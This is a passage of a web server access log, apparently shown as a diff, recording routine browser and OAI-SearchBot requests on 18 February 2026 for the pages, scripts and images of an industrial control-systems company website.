"https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:41:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:41:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:41:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:41:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 193.186.4.167] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:21:42:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:42:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 162.120.184.59] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:21:42:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 162.120.184.41] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:21:42:51 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:50:58 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:59:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 121.139.173.148] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.google.com/" -[18/Feb/2026:21:59:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 121.139.173.148] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:59:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 121.139.173.148] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:59:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 121.139.173.148] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:59:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 121.139.173.148] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:59:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 121.139.173.148] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 121.139.173.148] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 121.139.173.148] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 121.139.173.148] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 121.139.173.148] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 121.139.173.148] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 121.139.173.148] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 121.139.173.148] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 121.139.173.148] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:59:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 121.139.173.148] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:01:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 162.120.184.41] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.google.com/" -[18/Feb/2026:22:02:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 211.234.204.1] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:02:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:02:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 211.234.204.1] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:02:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 211.234.204.1] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:02:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 211.234.204.1] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:02:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 211.234.204.1] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:02:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:02:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 211.234.204.1] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:02:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 211.234.204.1] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:02:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 211.234.204.1] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:02:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 211.234.204.1] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:02:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:02:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 211.234.204.1] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:02:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 211.234.204.1] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:22:48:06 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[18/Feb/2026:22:48:42 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 211.234.204.1] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 211.234.204.1] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:22:48:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 211.234.204.1] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:23:58:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 74.7.229.221] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot" "-" +[18/Feb/2026:23:58:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/robots.txt" [Client 74.7.230.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[18/Feb/2026:23:58:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 74.7.229.221] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:23:58:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 74.7.229.19] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:23:58:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.229.221] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:23:58:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 74.7.228.139] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:23:58:46 +0000] - 200 200 - GET https 